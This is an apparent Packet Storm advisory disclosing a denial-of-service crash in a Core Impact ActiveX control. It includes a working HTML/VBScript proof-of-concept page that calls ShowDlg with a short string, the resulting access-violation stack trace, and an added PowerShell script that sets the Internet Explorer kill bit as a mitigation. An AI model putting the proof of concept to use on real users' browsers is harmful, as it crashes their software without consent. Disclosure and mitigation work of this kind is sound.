Core Impact Denial Of Service

2010-02-12T00:00:00
ID PACKETSTORM:86191
Type packetstorm
Reporter Beenu Arora
Modified 2010-02-12T00:00:00

Description

################################################################
# [darkc0de ASCII-art banner, garbled in extraction]           #
# est.2007                               forum.darkc0de.com    #
################################################################
# Greetz to all Darkc0de, AI, AH, ICW Members
# Shoutz to r45c4l, j4ckh4x0r, silic0n, smith, baltazar, d3hydr8, FB1H2S, lowlz, Eberly, Sumit, zerocode, dalsim, 7, Anirban, Anas, Navneet, Varun, Dilip, Manish
#Special Thanks to r45c4l for allowing analysis on his product  
  
#RegKey Safe for Script: False  
#RegKey Safe for Init: False  
  
#Implements IObjectSafety: True   
  
<html>
<body>
Test DoS Page
<object classid='clsid:CDF8A044-74AF-4045-AE13-D8AEDF802538' id='target'></object>
<script language='vbscript'>
' A one-character string passed to ShowDlg triggers the access violation shown below
arg1=String(1, "A")
target.ShowDlg arg1
</script>
</body>
</html>
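Because the control answers "safe" through IObjectSafety rather than through the registry safety categories, the practical host-side mitigation is the Internet Explorer kill bit, which makes IE refuse to instantiate the CLSID regardless of what the control reports. The script below is an added example, not part of the original advisory; it assumes an elevated PowerShell session and uses the CLSID from the PoC above.

```powershell
# Added example (not from the advisory): set the IE kill bit for the vulnerable control.
# Assumes an elevated session. CLSID taken from the PoC above.
$clsid   = '{CDF8A044-74AF-4045-AE13-D8AEDF802538}'
$killBit = 0x400   # COMPAT_EVIL_DONT_LOAD: IE never loads the control from a page

# Native view, plus the 32-bit view on 64-bit Windows (32-bit IE reads the latter).
$paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid")
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
}

function Set-KillBit([string]$Path) {
    if (-not (Test-Path $Path)) {
        New-Item -Path $Path -Force | Out-Null
    }
    # Merge with any compatibility flags already present instead of overwriting them.
    $current  = 0
    $existing = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($existing) { $current = [int]$existing.'Compatibility Flags' }
    $new = $current -bor $killBit
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $new -Type DWord
    return $new
}

function Test-KillBit([string]$Path) {
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band $killBit) -eq $killBit)
}

foreach ($p in $paths) {
    $flags = Set-KillBit $p
    Write-Host ("{0}`n  Compatibility Flags = 0x{1:X}  kill bit set: {2}" -f $p, $flags, (Test-KillBit $p))
}
```

Re-run Test-KillBit after any vendor update or reinstall of the control, since installers sometimes recreate the ActiveX Compatibility key without the flag.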
  
  
Access violation exception (0xC0000005) when trying to read from memory location 0x00000020 in the thread below.  
  
Function Arg 1 Arg 2 Arg 3 Source   
TargetControl+145d0 0000000f 00000000 00000000   
mfc80u!CWnd::WindowProc+22 0000000f 00000000 00000000   
mfc80u!AfxCallWndProc+a3 00000000 003008d0 0000000f   
mfc80u!AfxWndProc+35 003008d0 0000000f 00000000   
TargetControl!DllGetClassObject+c1a2 003008d0 0000000f 00000000   
user32!InternalCallWinProc+28 05987d5f 003008d0 0000000f   
user32!UserCallWinProcCheckWow+150 03c6a110 05987d5f 003008d0   
user32!DispatchClientMessage+a3 0068d978 0000000f 00000000   
user32!__fnDWORD+24 0013debc 00000018 0068d978   
ntdll!KiUserCallbackDispatcher+13 7e42aedc 003e08f6 0000005e   
user32!NtUserCallHwndLock+c 003e08f6 0694e16c 0013df74   
mfc80u!CWnd::RunModalLoop+77 00000004 4aba760d 00000000   
mfc80u!CDialog::DoModal+129 4ab791a2 05540874 00000000   
TargetControl+ef9f 0694db40 0000001c 00000004   
oleaut32!CTypeInfo2::Invoke+234 03c7491c 0694db40 00000000   
TargetControl+11c58 0694db40 00000001 00000409   
mshtml!COleSite::ContextInvokeEx+149 0414b6f0 00000001 00000409   
mshtml!COleSite::ContextThunk_InvokeEx+44 0414b6f0 00000001 00000409   
vbscript!IDispatchExInvokeEx2+a9 0003b8d8 0414ce50 00000001   
vbscript!IDispatchExInvokeEx+56 0003b8d8 0414ce50 00000001   
vbscript!InvokeDispatch+101 0003b8d8 0003b990 00000001   
vbscript!InvokeByName+42 0003b8d8 0414ce50 00000001   
vbscript!CScriptRuntime::RunNoEH+234c 0013e6a4 4aab5064 00000000   
vbscript!CScriptRuntime::Run+62 0013e6a4 0003fd08 0003b8d8   
vbscript!CScriptEntryPoint::Call+51 0013e6a4 00000000 00000000   
vbscript!CSession::Execute+c8 0003fd08 0013e888 00000000   
vbscript!COleScript::ExecutePendingScripts+144 0013e888 0013e868 0003e454   
vbscript!COleScript::ParseScriptTextCore+243 0414cd54 0414a394 00000000   
vbscript!COleScript::ParseScriptText+2b 0003e454 0414cd54 0414a394   
mshtml!CScriptCollection::ParseScriptText+1da 0414ca90 73301e34 00000000   
mshtml!CScriptElement::CommitCode+1e1 00000000 00000000 00000000   
mshtml!CScriptElement::Execute+a4 0414a520 06194d97 00000000   
mshtml!CHtmParse::Execute+41 0414a5e0 0414a520 7dcc4b65   
mshtml!CHtmPost::Broadcast+d 7dcc4b83 06194d97 0414a520   
mshtml!CHtmPost::Exec+32b 06194d97 0414a520 04140810   
mshtml!CHtmPost::Run+12 06194d97 04140810 06194ccf   
mshtml!PostManExecute+51 04140810 06194d97 0414a520   
mshtml!PostManOnTimer+76 00250938 00000113 00001003   
user32!InternalCallWinProc+28 7dcfb9d8 00250938 00000113   
user32!UserCallWinProc+f3 00000000 7dcfb9d8 00250938   
user32!DispatchMessageWorker+10e 0013eb90 00000000 0013eb78   
user32!DispatchMessageW+f 0013eb90 00000000 00163468   
browseui!TimedDispatchMessage+33 0013eb90 0013ee98 00000000   
browseui!BrowserThreadProc+336 00162ca8 0013ee98 00162ca8   
browseui!BrowserProtectedThreadProc+50 00162ca8 00162ca8 00000000   
browseui!SHOpenFolderWindow+22c 00162ca8 00000000 00000000   
shdocvw!IEWinMain+133 001523ba 00000001 0140d0b8   
iexplore!WinMainT+2de 00400000 00000000 001523ba   
iexplore!_ModuleEntry+99 0140d0b8 00000018 7ffdf000   
kernel32!BaseProcessStart+23 00402451 00000000 78746341   